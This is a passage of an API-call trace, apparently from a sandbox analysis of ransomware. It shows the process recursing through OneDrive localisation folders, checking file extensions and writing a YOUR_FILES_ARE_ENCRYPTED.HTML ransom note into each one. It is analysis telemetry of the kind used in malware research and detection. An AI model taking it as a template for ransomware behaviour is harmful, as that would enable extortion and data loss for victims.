returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja" [0111.958] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\*" [0111.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x153086e5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x153086e5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x158d8246, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.958] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x153086e5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x153086e5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x158d8246, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0111.959] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x158d8246, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x158d8246, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x15bf948f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.959] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.959] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui") returned 114 [0111.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.959] lstrlenW (lpString=".mui") returned 4 [0111.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.959] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x158d8246, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x158d8246, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x15bf948f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.959] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.959] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.959] GetProcessHeap () returned 0x600000 [0111.959] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0111.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.960] WriteFile (in: hFile=0x310, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.960] CloseHandle (hObject=0x310) returned 1 [0111.961] GetProcessHeap () returned 0x600000 [0111.961] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0111.961] GetProcessHeap () returned 0x600000 [0111.961] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.961] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15e0f45b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x15e0f45b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x15e0f45b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ka", cAlternateFileName="")) returned 1 [0111.961] StrStrIW (lpFirst="ka", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.961] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka") returned 78 [0111.961] GetProcessHeap () returned 0x600000 [0111.961] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0111.961] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka" [0111.961] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\*" [0111.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15e0f45b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x15e0f45b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1610a43c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.962] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15e0f45b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x15e0f45b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1610a43c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1610a43c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1610a43c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x16392bdd, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.962] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.962] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\FileSync.LocalizedResources.dll.mui") returned 114 [0111.962] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.962] lstrlenW (lpString=".mui") returned 4 [0111.962] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.962] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1610a43c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1610a43c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x16392bdd, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.962] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.962] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.962] GetProcessHeap () returned 0x600000 [0111.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0111.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.963] WriteFile (in: hFile=0x310, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.963] CloseHandle (hObject=0x310) returned 1 [0111.964] GetProcessHeap () returned 0x600000 [0111.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0111.964] GetProcessHeap () returned 0x600000 [0111.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.964] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16582b22, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16582b22, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x16582b22, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kk", cAlternateFileName="")) returned 1 [0111.964] StrStrIW (lpFirst="kk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.964] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk") returned 78 [0111.964] GetProcessHeap () returned 0x600000 [0111.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0111.964] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk" [0111.964] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\*" [0111.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16582b22, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16582b22, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x169161d2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626978 [0111.964] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16582b22, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16582b22, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x169161d2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0111.964] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169161d2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x169161d2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x17206ef6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0111.964] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.965] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\FileSync.LocalizedResources.dll.mui") returned 114 [0111.965] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.965] lstrlenW (lpString=".mui") returned 4 [0111.965] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0111.965] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169161d2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x169161d2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x17206ef6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0111.965] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0111.965] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.965] GetProcessHeap () returned 0x600000 [0111.965] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0111.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.965] WriteFile (in: hFile=0x310, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.966] CloseHandle (hObject=0x310) returned 1 [0111.966] GetProcessHeap () returned 0x600000 [0111.966] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0111.967] GetProcessHeap () returned 0x600000 [0111.967] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0111.967] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x173aa99c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x173aa99c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x173aa99c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="km-kh", cAlternateFileName="")) returned 1 [0111.967] StrStrIW (lpFirst="km-kh", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.967] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh") returned 81 [0111.967] GetProcessHeap () returned 0x600000 [0111.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0111.980] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh" [0111.980] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\*" [0111.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x173aa99c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x173aa99c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x17f23e2a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.072] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x173aa99c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x173aa99c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x17f23e2a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.072] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f23e2a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x17f23e2a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.072] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.072] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.072] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.072] lstrlenW (lpString=".mui") returned 4 [0112.072] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.072] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f23e2a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x17f23e2a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.072] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.072] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.073] GetProcessHeap () returned 0x600000 [0112.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.074] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.075] CloseHandle (hObject=0x330) returned 1 [0112.075] GetProcessHeap () returned 0x600000 [0112.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.075] GetProcessHeap () returned 0x600000 [0112.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0112.077] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b820b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x18b820b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x18b820b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kn", cAlternateFileName="")) returned 1 [0112.077] StrStrIW (lpFirst="kn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.077] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn") returned 78 [0112.077] GetProcessHeap () returned 0x600000 [0112.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.078] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn" [0112.078] lstrcatW (in: 